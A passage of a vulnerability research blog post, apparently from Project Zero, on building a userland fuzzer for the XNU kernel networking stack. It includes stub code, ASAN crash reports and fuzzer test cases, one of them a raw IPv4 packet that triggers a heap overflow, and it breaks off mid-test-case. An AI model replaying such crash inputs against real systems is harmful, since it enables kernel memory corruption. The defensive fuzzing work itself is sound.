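One piece not shown above is the flattening step that joins these headers into the final on-the-wire bytes. A hedged sketch of its shape, assuming a get_ip_hdr helper that mirrors get_tcp_hdr for the IpHdr message:

#include <string>

std::string get_tcp_packet(const TcpPacket &packet) {
  std::string ip_hdr = get_ip_hdr(packet.ip_hdr());     // assumed IpHdr counterpart
  std::string tcp_hdr = get_tcp_hdr(packet.tcp_hdr());  // shown above
  return ip_hdr + tcp_hdr + packet.data();              // headers, then payload
}

The resulting byte string is what ultimately gets wrapped in an mbuf and handed to ip_input.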

High-Level Emulation

Now that we have the code building and an initial fuzz target running, we begin the first pass at implementing all of the stubbed code that is reachable by our fuzz target. Because we have a fuzz target that builds and runs, we now get instant feedback about which functions our target hits. Some core functionality has to be supported before we can find any bugs, so the first attempt to run the fuzzer deserves its own development phase. For example, until dynamic memory allocation is supported, almost none of the kernel code we want to cover will run, given how heavily it depends on allocation.

We'll be implementing our stubbed functions with fake variants that attempt to have the same semantics. For example, when testing code that uses an external database library, you could replace the database with a simple in-memory implementation. If you don't care about finding database bugs, this often makes fuzzing simpler and more robust. For some kernel subsystems unrelated to networking, we can use entirely different or null implementations. This process is reminiscent of high-level emulation, an idea used in game console emulation. Rather than aiming to emulate hardware, you can try to preserve the semantics but use a custom implementation of the API. Because we only care about testing networking, this is how we approach faking subsystems in this project.

I always start by looking at the original function implementation. If it's possible, I just link in that code as well. But some functionality isn't compatible with our fuzzer and must be faked. For example, zalloc should call the userland malloc, since virtual memory is already managed by our host kernel and we have allocator facilities available. Similarly, copyin and copyout need to be faked, as they no longer serve to copy data between user and kernel pages. Sometimes we also just "nop" out functionality that we don't care about. We'll cover these decisions in more detail shortly. Note that by implementing these stubs lazily, whenever our fuzz target hits them, we immediately reduce the work of handling all the unrelated functions by an order of magnitude. It's easier to stay motivated when you only implement fakes for functions that are used by the target code. This approach successfully saved me a lot of time, and I've used it on subsequent projects as well. At the time of writing, I have 398 stubbed functions, about 250 functions that are trivially faked (returning 0 or void functions that do nothing), and about 25 functions that I faked myself (almost all related to porting the memory allocation systems to userland), as sketched below.
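As a flavor of the "trivially faked" bucket, here is a hedged sketch (names kept, signatures simplified; not the literal contents of fuzz/fake_impls.c): since the harness is single-threaded, locking can safely become a no-op.

// Locking is meaningless without other threads, so these fakes do nothing.
void lck_mtx_lock(void *mtx) { (void)mtx; }
void lck_mtx_unlock(void *mtx) { (void)mtx; }
void lck_rw_done(void *rwlock) { (void)rwlock; }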

Booting Up

As soon as we start running the fuzzer, we'll run into a snag: many resources require a one-time initialization that happens on boot. The BSD half of the kernel is mostly initialized by calling the bsd_init function. That function, in turn, calls several subsystem-specific initialization functions. Keeping with the theme of supporting a minimally necessary subset of the kernel, rather than call bsd_init, we create a new function that only initializes parts of the kernel as needed.

Here's an example crash that occurs without the one-time kernel bootup initialization:

    #7 0x7effbc464ad0 in zalloc /source/build3/../fuzz/zalloc.c:35:3
    #8 0x7effbb62eab4 in pipepair_alloc /source/build3/../bsd/kern/sys_pipe.c:634:24
    #9 0x7effbb62ded5 in pipe /source/build3/../bsd/kern/sys_pipe.c:425:10
    #10 0x7effbc4588ab in pipe_wrapper /source/build3/../fuzz/syscall_wrappers.c:216:10
    #11 0x4ee1a4 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:979:19

Our zalloc implementation (covered in the next section) failed because the pipe zone wasn't yet initialized:

static int
pipepair_alloc(struct pipe **rp_out, struct pipe **wp_out)
{
        struct pipepair *pp = zalloc(pipe_zone);

Scrolling up in sys_pipe.c, we see where that zone is initialized:

void
pipeinit(void)
{
        nbigpipe = 0;
        vm_size_t zone_size;

        zone_size = 8192 * sizeof(struct pipepair);
        pipe_zone = zinit(sizeof(struct pipepair), zone_size, 4096, "pipe zone");

Sure enough, this function is called by bsd_init. After adding that call to our initial setup function, the zone works as expected. After some development cycles spent supporting all the needed bsd_init function calls, we have the following:

__attribute__((visibility("default"))) bool initialize_network() {
  mcache_init();
  mbinit();
  eventhandler_init();
  pipeinit();
  dlil_init();
  socketinit();
  domaininit();
  loopattach();
  ether_family_init();
  tcp_cc_init();
  net_init_run();
  int res = necp_init();
  assert(!res);
  return true;
}


The original bsd_init is 683 lines long, but our initialize_network clone is the preceding short snippet. I want to remark how cool I found it that you could "boot" a kernel like this and have everything work so long as you implemented all the relevant stubs. It just goes to show a surprising fact: a significant amount of kernel code is portable, and simple steps can be taken to make it testable. These codebases can be modernized without being fully rewritten. As this "boot" relies on dynamic allocation, let's look at how I implemented that next.

Dynamic Memory Allocation

Providing a virtual memory abstraction is a fundamental goal of most kernels, but the good news is that this is out of scope for this project (it is left as an exercise for the reader). Because networking already assumes working virtual memory, the network stack functions almost entirely on top of high-level allocator APIs. This makes the subsystem amenable to "high-level emulation". We can create a thin shim layer that intercepts XNU-specific allocator calls and translates them to the relevant host APIs.

In practice, we have to handle three types of allocations for this project: "classic" allocations (malloc/calloc/free), zone allocations (zalloc), and mbufs (memory buffers). The first two are fundamental allocation types used across XNU, while mbufs are a common data structure used in low-level networking code.

The zone allocator is reasonably complicated, but we use a simplified model for our purposes: we just track the size assigned to a zone when it is created and make sure we allocate that size when zalloc is later called using the initialized zone. This could undoubtedly be modeled better, but this initial model worked quite well for the types of bugs I was looking for. In practice, this simplification affects exploitability, but we aren't worried about that for a fuzzing project, as we can assess that manually once we discover an issue. As you can see below, I created a custom zone type that simply stored the configured size, knowing that my zinit would return an opaque pointer that would be passed to my zalloc implementation, which could then use calloc to service the request. zfree simply freed the requested bytes and ignored the zone, as allocation sizes are tracked by the host malloc already.

struct zone {
  uintptr_t size;
};

struct zone* zinit(uintptr_t size, uintptr_t max, uintptr_t alloc,
                   const char* name) {
  struct zone* zone = (struct zone*)calloc(1, sizeof(struct zone));
  zone->size = size;
  return zone;
}

void* zalloc(struct zone* zone) {
  assert(zone != NULL);
  return calloc(1, zone->size);
}

void zfree(void* zone, void* dat) {
  (void)zone;
  free(dat);
}

Kalloc, kfree, and related functions were passed through to malloc and free as well. You can see fuzz/zalloc.c for their implementations. Mbufs (memory buffers) are more work to implement because they contain considerable metadata that is exposed to the "client" networking code.

struct m_hdr {
        struct mbuf     *mh_next;       /* next buffer in chain */
        struct mbuf     *mh_nextpkt;    /* next chain in queue/record */
        caddr_t         mh_data;        /* location of data */
        int32_t         mh_len;         /* amount of data in this mbuf */
        u_int16_t       mh_type;        /* type of data in this mbuf */
        u_int16_t       mh_flags;       /* flags; see below */
};

/*
 * The mbuf object
 */
struct mbuf {
        struct m_hdr m_hdr;
        union {
                struct {
                        struct pkthdr MH_pkthdr;        /* M_PKTHDR set */
                        union {
                                struct m_ext MH_ext;    /* M_EXT set */
                                char    MH_databuf[_MHLEN];
                        } MH_dat;
                } MH;
                char    M_databuf[_MLEN];               /* !M_PKTHDR, !M_EXT */
        } M_dat;
};


I didn't include the pkthdr or m_ext structure definitions, but they are nontrivial (you can see for yourself in bsd/sys/mbuf.h). A lot of trial and error was needed to create a simplified mbuf format that would work. In practice, I use an inline buffer when possible and, when necessary, locate the data in one large external buffer and set the M_EXT flag. As these allocations must be aligned, I use posix_memalign to create them, rather than malloc. Fortunately, ASAN can help manage these allocations, so we can detect some bugs with this modification.
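Here is a hedged sketch of the shape of that strategy; the real mbuf_create in fuzz/zalloc.c differs in detail, and the 2048-byte alignment is an assumption for illustration. _MLEN, M_EXT, caddr_t, and struct mbuf come from the XNU headers quoted above.

#include <cstdlib>

struct mbuf *mbuf_create(size_t size) {
  struct mbuf *m = (struct mbuf *)calloc(1, sizeof(struct mbuf));
  if (size <= _MLEN) {
    m->m_hdr.mh_data = m->M_dat.M_databuf;  // small payloads live inline
  } else {
    void *buf = NULL;
    // Aligned external storage; ASAN still tracks this allocation for us.
    posix_memalign(&buf, 2048, size);
    m->m_hdr.mh_data = (caddr_t)buf;
    m->m_hdr.mh_flags |= M_EXT;
  }
  m->m_hdr.mh_len = (int32_t)size;
  return m;  // error handling omitted for brevity
}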

Two bugs I reported via the Project Zero tracker highlight the benefit of the heap-based mbuf implementation. In the first report, I detected an mbuf double free using ASAN. While the m_free implementation tries to detect double frees by checking the state of the allocation, ASAN goes even further by quarantining recently freed allocations to detect the bug. In this case, it looks like the fuzzer would have found the bug either way, but it was impressive. The second issue linked is much subtler and requires some instrumentation to detect, as it is a use-after-free read of an mbuf:

==22568==ERROR: AddressSanitizer: heap-use-after-free on address 0x61500026afe5 at pc 0x7ff60f95cace bp 0x7ffd4d5617b0 sp 0x7ffd4d5617a8
READ of size 1 at 0x61500026afe5 thread T0
    #0 0x7ff60f95cacd in tcp_input bsd/netinet/tcp_input.c:5029:25
    #1 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2
    #2 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10

0x61500026afe5 is located 229 bytes inside of 256-byte region [0x61500026af00,0x61500026b000)
freed by thread T0 here:
    #0 0x4a158d in free /b/swarming/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3
    #1 0x7ff60fb7444d in m_free fuzz/zalloc.c:220:3
    #2 0x7ff60f4e3527 in m_freem bsd/kern/uipc_mbuf.c:4842:7
    #3 0x7ff60f5334c9 in sbappendstream_rcvdemux bsd/kern/uipc_socket2.c:1472:3
    #4 0x7ff60f95821d in tcp_input bsd/netinet/tcp_input.c:5019:8
    #5 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2
    #6 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10


Apple managed to catch this issue before I reported it, fixing it in iOS 13. I believe Apple has added some internal hardening or testing for mbufs that caught this bug. It could be anything from a hardened mbuf allocator like GWP-ASAN, to an internal ARM MTE test, to simple auditing, but it was really cool to see this issue detected in this way, and also that Apple was proactive enough to find this themselves.

Accessing User Memory

When talking about this project with a fellow attendee at a fuzzing conference, their biggest question was how I handled user memory access. Kernels are never supposed to trust pointers provided by user-space, so whenever the kernel wants to access memory mapped in userspace, it goes through the intermediate functions copyin and copyout. By replacing these functions with our fake implementations, we can supply fuzzer-provided input to the tested code. The real kernel would have done the relevant copies from user to kernel pages. Because these copies are driven by the target code and not our testcase, I added a buffer to the protobuf specification to be used to service these requests.

Here's a backtrace from our stub before we implement `copyin`. As you can see, when calling the `recvfrom` syscall, our fuzzer passed in a pointer as an argument.

    #6 0x7fe1176952f3 in Assert /source/build3/../fuzz/stubs.c:21:3
    #7 0x7fe11769a110 in copyin /source/build3/../fuzz/fake_impls.c:408:3
    #8 0x7fe116951a18 in __copyin_chk /source/build3/../bsd/libkern/copyio.h:47:9
    #9 0x7fe116951a18 in recvfrom_nocancel /source/build3/../bsd/kern/uipc_syscalls.c:2056:11
    #10 0x7fe117691a86 in recvfrom_nocancel_wrapper /source/build3/../fuzz/syscall_wrappers.c:244:10
    #11 0x4e933a in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:936:9
    #12 0x4e43b8 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1

I've extended the copyin specification with my fuzzer-specific semantics: when the pointer (void*)1 is passed as an address, we interpret this as a request to fetch arbitrary bytes. Otherwise, we copy directly from that virtual memory address. This way, we can begin by passing (void*)1 everywhere in the fuzz target to get as much cheap coverage as possible. Later, as we want to construct well-formed data to pass into syscalls, we build the data in the protobuf test case handler and pass a real pointer to it, allowing it to be copied. This flexibility saves us time while permitting the construction of highly structured data inputs as we see fit.

int __attribute__((warn_unused_result))
copyin(void* user_addr, void* kernel_addr, size_t nbytes) {
  // Address 1 means use fuzzed bytes, otherwise use real bytes.
  // NOTE: this does not support nested useraddr.
  if (user_addr != (void*)1) {
    memcpy(kernel_addr, user_addr, nbytes);
    return 0;
  }
  if (get_fuzzed_bool()) {
    return -1;
  }
  get_fuzzed_bytes(kernel_addr, nbytes);
  return 0;
}

Copyout is designed similarly. We often don't care about the data copied out; we just care about the safety of the accesses. For that reason, we make sure to memcpy from the source buffer in all cases, using a temporary buffer when a copy to (void*)1 occurs. If the kernel copies out of bounds or from freed memory, for example, ASAN will catch it and inform us about a memory disclosure vulnerability.
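A hedged sketch of what that could look like, mirroring the copyin above: the read of kernel_addr always happens so ASAN can observe it, with a scratch buffer standing in for the missing user mapping when the (void*)1 marker is used.

#include <cstdlib>
#include <cstring>

int copyout(const void *kernel_addr, void *user_addr, size_t nbytes) {
  if (user_addr != (void *)1) {
    memcpy(user_addr, kernel_addr, nbytes);
    return 0;
  }
  // No real destination: copy into scratch space purely so the source
  // bytes are read under ASAN.
  char *scratch = (char *)malloc(nbytes);
  memcpy(scratch, kernel_addr, nbytes);
  free(scratch);
  return 0;
}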

Synchronization and Threads

Among the many changes made to XNU's behavior to support this project, perhaps the most extensive and invasive are the changes I made to the synchronization and threading model. Before beginning this project, I had spent over a year working on Chrome browser process research, where high-level "sequences" are preferred to using physical threads. Despite a paucity of data races, Chrome still had sequence-related bugs that were triggered by randomly servicing some of the pending work in between performing synchronous IPC calls. In an exploit for a bug found by the AppCache fuzzer, sleep calls were needed to get the asynchronous work to be completed before queueing up some more work synchronously. So I already knew that asynchronous continuation-passing style concurrency could have exploitable bugs that are easy to discover with this fuzzing approach.

I suspected I could find similar bugs if I used a similar model for sockfuzzer. Because XNU uses multiple kernel threads in its networking stack, I would have to port it to a cooperative style. To do this, I provided no-op implementations for all of the thread management functions and sync primitives, and instead randomly called the work functions that would have been called by the real threads. This involved modifying code: most worker threads run in a loop, processing new work as it comes in. I modified these infinitely looping helper functions to do one iteration of work and exposed them to the fuzzer frontend. Then I called them randomly as part of the protobuf message. The main benefit of doing the project this way was improved performance and determinism. Places where the kernel could block the fuzzer were modified to return early. Overall, it was a lot simpler and easier to manage a single-threaded process. But this decision did not end up yielding as many bugs as I had hoped. For example, I suspected that interleaving garbage collection of various network-related structures with syscalls would be more effective. It did achieve the goal of removing threading-related headaches from deploying the fuzzer, but this is a serious weakness that I would like to address in future fuzzer revisions.
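Shape-wise, the conversion looks something like the following (illustrative only, not actual XNU code): an infinitely looping worker becomes a single-iteration function that the fuzzer can invoke as one of its commands.

// Original pattern, run on a dedicated kernel thread:
//   for (;;) { wait_for_work(); do_one_unit_of_work(); }

void do_one_unit_of_work(void);  // stands in for the real work body

// Fuzzer-friendly version: one iteration, exported so the protobuf
// command handler can interleave it with syscalls and packets.
__attribute__((visibility("default"))) void example_worker_once(void) {
  do_one_unit_of_work();
}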

Randomness

Randomness is another service provided by kernels, both to userland (e.g., /dev/random) and to in-kernel services that require it. This is easy to emulate: we can just return as many bytes as were requested from the current test case's data_provider field.
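A hedged sketch of such a fake (the signature is simplified from the XNU original), reusing the same get_fuzzed_bytes helper that services copyin:

#include <cstddef>

void get_fuzzed_bytes(void *buf, size_t nbytes);  // prototype assumed

void read_random(void *buffer, unsigned int numbytes) {
  get_fuzzed_bytes(buffer, numbytes);  // bytes come straight from data_provider
}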

Authentication

XNU features some mechanisms (KAuth, MAC checks, user checks) to determine whether a given syscall is permissible. Because of the importance and relative rarity of bugs in XNU, and my willingness to triage false positives, I decided to allow all actions by default. For example, the TCP multipath code requires a special entitlement, but disabling this functionality would preclude us from finding Ian's multipath vulnerability. Rather than fuzz only the code accessible inside the app sandbox, I figured I would just triage whatever comes up and report it with the appropriate severity in mind.

For example, when we create a socket, the kernel checks whether the running process is allowed to make a socket of the given domain, type, and protocol, given its KAuth credentials:

static int
socket_common(struct proc *p,
    int domain,
    int type,
    int protocol,
    pid_t epid,
    int32_t *retval,
    int delegate)
{
        struct socket *so;
        struct fileproc *fp;
        int fd, error;

        AUDIT_ARG(socket, domain, type, protocol);
#if CONFIG_MACF_SOCKET_SUBSET
        if ((error = mac_socket_check_create(kauth_cred_get(), domain,
            type, protocol)) != 0) {
                return error;
        }
#endif /* MAC_SOCKET_SUBSET */

When we reach this function in our fuzzer, we trigger an assert crash, as this functionality was stubbed.

    #6 0x7f58f49b53f3 in Assert /source/build3/../fuzz/stubs.c:21:3
    #7 0x7f58f49ba070 in kauth_cred_get /source/build3/../fuzz/fake_impls.c:272:3
    #8 0x7f58f3c70889 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:39
    #9 0x7f58f3c7043a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9
    #10 0x7f58f49b45e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10
    #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19

Now, we need to implement kauth_cred_get. In this case, we return a (void*)1 pointer so that NULL checks on the value will pass (and if it turns out we need to model this correctly, we'll crash again when the pointer is used).

void* kauth_cred_get() {
  return (void*)1;
}

Now we crash while actually checking permissions, this time in mac_socket_check_create.

    #6 0x7fbe9219a3f3 in Assert /source/build3/../fuzz/stubs.c:21:3
    #7 0x7fbe9219f100 in mac_socket_check_create /source/build3/../fuzz/fake_impls.c:312:33
    #8 0x7fbe914558a3 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:15
    #9 0x7fbe9145543a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9
    #10 0x7fbe921995e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10
    #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19
    #12 0x4e76c2 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1

Now we simply return 0 and move on.

int mac_socket_check_create() { return 0; }

As you can see, we don't always need to do a lot of work to fake functionality. We can opt for a much simpler model that still gets us the results we want.

Coverage Guided Development

We've paid a sizable initial cost to implement this fuzz target, but we're now entering the longest and most fun stage of the project: iterating and maintaining the fuzzer. We begin by running the fuzzer continuously (in my case, I ensured it could run on ClusterFuzz). A day of work then consists of fetching the latest corpus, running a clang-coverage visualization pass over it, and viewing the report. While initially most of the work involved fixing assertion failures to get the fuzzer working, we now look for silent implementation deficiencies only visible in the coverage reports. A snippet from the report looks like the following:

(Coverage report excerpt: several lines of code have a column indicating that they have been covered tens of thousands of times. Below them is a switch statement for handling the parsing of IP options. Only the default case is covered, approximately fifty thousand times, while the routing record options are covered 0 times.)

This excerpt from the IP option handling shows that the current version of the fuzzer and grammar doesn't exercise these packet options at all. Having this visualization is enormously helpful and necessary to succeed, as it is a source of truth about your fuzz target. By directing development work around these reports, it's relatively easy to plan actionable and high-value tasks around the fuzzer.

I like to think about improving a fuzz target by either improving "soundness" or "completeness." Logicians probably wouldn't be happy with how loosely I'm using these terms, but they are a good metaphor for the task. To start with, we can improve the completeness of a given fuzz target by helping it reach code that we know to be reachable based on manual review. In the above example, I would suspect very strongly that the uncovered option handling code is reachable. But despite a long fuzzing campaign, these lines are uncovered, and therefore our fuzz target is incomplete, somehow unable to generate inputs reaching these lines. There are two ways to get this needed coverage: in a top-down or bottom-up fashion. Each has its tradeoffs. The top-down way to cover this code is to improve the existing grammar or C++ code to make it possible or more likely. The bottom-up way is to modify the code in question. For example, we could replace switch (opt) with something like switch (global_fuzzed_data->ConsumeRandomEnum(valid_enums)), as sketched below. This bottom-up approach introduces unsoundness, as maybe these enums could never have been selected at this point. But this approach has often led to interesting-looking crashes that encouraged me to revert the change and proceed with the more expensive top-down implementation. When it's one researcher working against potentially hundreds of thousands of lines, you need tricks to prioritize your work. By placing many cheap bets, you can revert later for free and focus on the most fruitful areas.
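For illustration, that bottom-up patch might take a shape like this (FUZZER_BUILD and the handler names are made up; only the ConsumeRandomEnum call echoes the text):

void handle_ip_option(int opt) {
#ifdef FUZZER_BUILD
  // Unsound: ignore the real option byte so every handler is reachable.
  opt = global_fuzzed_data->ConsumeRandomEnum(valid_enums);
#endif
  switch (opt) {
    case IPOPT_RR:  // record route: the case covered 0 times above
      // ... handling ...
      break;
    default:
      break;
  }
}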

Improving soundness is the other side of the coin here. I've just mentioned reverting unsound changes and moving those changes out of the target code and into the grammar. But our fake objects are also simple models for how their real implementations behave. If those models are too simple or directly inaccurate, we may either miss bugs or introduce them. I'm comfortable missing some bugs, as I think these simple fakes enable better coverage, and it's a net win. But sometimes, I'll observe a crash or a failure to cover some code because of a faulty model. So improvements can often come in the form of making these fakes better.

All in all, there is plenty of work that can be done at any given point. Fuzzing isn't an all-or-nothing, one-shot endeavor for large targets like this. This is a continuous process, and as time goes on, easy gains become harder to achieve, as most bugs detectable with this approach are found and, eventually, there comes a natural stopping point. But after working on this project for several months, it's remarkably far from the finish line, despite having already produced several useful bug reports. The cool thing about fuzzing in this way is that it is a bit like excavating a fossil. Each target is different; we make small changes to the fuzzer, tapping away at the target with a chisel each day and letting our coverage metrics, not our biases, reveal the path forward.

Packet Delivery

I'd like to cover one example to demonstrate the value of the "bottom-up" unsound modification, as in some cases, the unsound modification is dramatically cheaper than the grammar-based one. Disabling hash checks is a well-known fuzzer-only modification when fuzzer authors know that checksums could be trivially generated by hand. But it can also be applied in other places, such as packet delivery.

When an mbuf containing a TCP packet arrives, it is handled by tcp_input. In order for almost anything meaningful to occur with this packet, it must be matched by IP address and port to an existing protocol control block (PCB) for that connection, as seen below.

void
tcp_input(struct mbuf *m, int off0)
{
// ...
        if (isipv6) {
            inp = in6_pcblookup_hash(&tcbinfo, &ip6->ip6_src, th->th_sport,
                &ip6->ip6_dst, th->th_dport, 1,
                m->m_pkthdr.rcvif);
        } else
#endif /* INET6 */
        inp = in_pcblookup_hash(&tcbinfo, ip->ip_src, th->th_sport,
            ip->ip_dst, th->th_dport, 1, m->m_pkthdr.rcvif);

Here's the IPv4 lookup code. Note that faddr, fport_arg, laddr, and lport_arg are all taken directly from the packet and are checked against the list of PCBs, one at a time. This means that we must guess two 4-byte integers and two 2-byte shorts to match the packet to the relevant PCB. Even coverage-guided fuzzing is going to have a hard time guessing its way through these comparisons. While eventually a match will be found, we can radically improve the odds of covering meaningful code by just flipping a coin instead of doing the comparisons. This change is extremely easy to make, as we can fetch a random boolean from the fuzzer at runtime. Looking up existing PCBs and fixing up the IP/TCP headers before sending the packets is a sounder solution, but in my testing this change didn't introduce any regressions. Now when a vulnerability is discovered, it's just a matter of fixing up headers to match packets to the appropriate PCB. That's light work for a vulnerability researcher looking for a remote memory corruption bug.

/*
 * Lookup PCB in hash list.
 */
struct inpcb *
in_pcblookup_hash(struct inpcbinfo *pcbinfo, struct in_addr faddr,
    u_int fport_arg, struct in_addr laddr, u_int lport_arg, int wildcard,
    struct ifnet *ifp)
{
// ...
    head = &pcbinfo->ipi_hashbase[INP_PCBHASH(faddr.s_addr, lport, fport,
        pcbinfo->ipi_hashmask)];
    LIST_FOREACH(inp, head, inp_hash) {
-               if (inp->inp_faddr.s_addr == faddr.s_addr &&
-                   inp->inp_laddr.s_addr == laddr.s_addr &&
-                   inp->inp_fport == fport &&
-                   inp->inp_lport == lport) {
+               if (!get_fuzzed_bool()) {
                        if (in_pcb_checkstate(inp, WNT_ACQUIRE, 0) !=
                                WNT_STOPUSING) {
                                lck_rw_done(pcbinfo->ipi_lock);
                                return inp;

Astute readers may have noticed that the PCBs are fetched from a hash table, so it's not enough just to replace the check. The 4 values used in the linear search are used to calculate a PCB hash, so we have to make sure all PCBs share a single bucket, as seen in the diff below. The real kernel shouldn't do this, as lookups become O(n), but we only create a few sockets, so it's acceptable.

diff --git a/bsd/netinet/in_pcb.h b/bsd/netinet/in_pcb.h
index a5ec42ab..37f6ee50 100644
--- a/bsd/netinet/in_pcb.h
+++ b/bsd/netinet/in_pcb.h
@@ -611,10 +611,9 @@ struct inpcbinfo {
        u_int32_t               ipi_flags;
 };
-#define INP_PCBHASH(faddr, lport, fport, mask) \
-       (((faddr) ^ ((faddr) >> 16) ^ ntohs((lport) ^ (fport))) & (mask))
-#define INP_PCBPORTHASH(lport, mask) \
-       (ntohs((lport)) & (mask))
+// nedwill: let all pcbs share the same hash
+#define        INP_PCBHASH(faddr, lport, fport, mask) (0)
+#define        INP_PCBPORTHASH(lport, mask) (0)
 #define INP_IS_FLOW_CONTROLLED(_inp_) \
        ((_inp_)->inp_flags & INP_FLOW_CONTROLLED)

Checking Our Work: Reproducing the Sample Bugs

With most of the necessary supporting code implemented, we can fuzz for a while without hitting any assertions due to unimplemented stubbed functions. At this stage, I reverted the fixes for the two inspiration bugs I mentioned at the beginning of this article. Here's what we see shortly after we run the fuzzer with those fixes reverted:

==1633983==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00029f474 at pc 0x00000049fcb7 bp 0x7ffcddc88590 sp 0x7ffcddc87d58
WRITE of size 20 at 0x61d00029f474 thread T0
    #0 0x49fcb6 in __asan_memmove /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:30:3
    #1 0x7ff64bd83bd9 in __asan_bcopy fuzz/san.c:37:3
    #2 0x7ff64ba9e62f in icmp_error bsd/netinet/ip_icmp.c:362:2
    #3 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2
    #4 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34
    #5 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3
    #6 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7
    #7 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9

0x61d00029f474 is located 12 bytes to the left of 2048-byte region [0x61d00029f480,0x61d00029fc80)
allocated by thread T0 here:
    #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3
    #1 0x7ff64bd82b20 in mbuf_create fuzz/zalloc.c:157:45
    #2 0x7ff64bd8319e in mcache_alloc fuzz/zalloc.c:187:12
    #3 0x7ff64b69ae84 in m_getcl bsd/kern/uipc_mbuf.c:3962:6
    #4 0x7ff64ba9e15c in icmp_error bsd/netinet/ip_icmp.c:296:7
    #5 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2
    #6 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34
    #7 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3
    #8 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7
    #9 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9

When we inspect the test case, we see that a single raw IPv4 packet was generated to trigger this bug. This is to be expected, as the bug doesn't require an existing connection, and looking at the stack, we can see that the test case triggered the bug in the IPv4-specific ip_input path.

commands {
  ip_input {
    raw_ip4: "M\001\000I\001\000\000\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII"
  }
}
data_provider: ""


If we fix that issue and fuzz a bit longer, we soon see another crash, this time in the MPTCP stack. This is Ian's MPTCP vulnerability. The ASAN report looks strange, though. Why is it crashing during garbage collection in mptcp_session_destroy? The original vulnerability was an OOB write, but ASAN couldn't catch it because it corrupted memory within a struct. This is a well-known shortcoming of ASAN and similar mitigations, including the upcoming MTE. This means we don't catch the bug until later, when a randomly corrupted pointer is accessed.

==1640571==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x6190000079dc in thread T0
    #0 0x4a0094 in free /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3
    #1 0x7fbdfc7a16b0 in _FREE fuzz/zalloc.c:293:36
    #2 0x7fbdfc52b624 in mptcp_session_destroy bsd/netinet/mptcp_subr.c:742:3
    #3 0x7fbdfc50c419 in mptcp_gc bsd/netinet/mptcp_subr.c:4615:3
    #4 0x7fbdfc4ee052 in mp_timeout bsd/netinet/mp_pcb.c:118:16
    #5 0x7fbdfc79b232 in clear_all fuzz/backend.c:83:3
    #6 0x4dfd5c in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:1010:3

0x6190000079dc is located 348 bytes inside of 920-byte region [0x619000007880,0x619000007c18)
allocated by thread T0 here:
    #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3
    #1 0x7fbdfc7a03d4 in zalloc fuzz/zalloc.c:37:10
    #2 0x7fbdfc4ee710 in mp_pcballoc bsd/netinet/mp_pcb.c:222:8
    #3 0x7fbdfc53cf8a in mptcp_attach bsd/netinet/mptcp_usrreq.c:211:15
    #4 0x7fbdfc53699e in mptcp_usr_attach bsd/netinet/mptcp_usrreq.c:128:10
    #5 0x7fbdfc0e1647 in socreate_internal bsd/kern/uipc_socket.c:784:10
    #6 0x7fbdfc0e23a4 in socreate bsd/kern/uipc_socket.c:871:9
    #7 0x7fbdfc118695 in socket_common bsd/kern/uipc_syscalls.c:266:11
    #8 0x7fbdfc1182d1 in socket bsd/kern/uipc_syscalls.c:214:9
    #9 0x7fbdfc79a26e in socket_wrapper fuzz/syscall_wrappers.c:371:10
    #10 0x4dd275 in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:655:19

Here's the protobuf input for the crashing testcase:

commands {
  socket {
    domain: AF_MULTIPATH
    so_type: SOCK_STREAM
    protocol: IPPROTO_IP
  }
}
commands {
  connectx {
    socket: FD_0
    endpoints {
      sae_srcif: IFIDX_CASE_0
      sae_srcaddr {
        sockaddr_generic {
          sa_family: AF_MULTIPATH
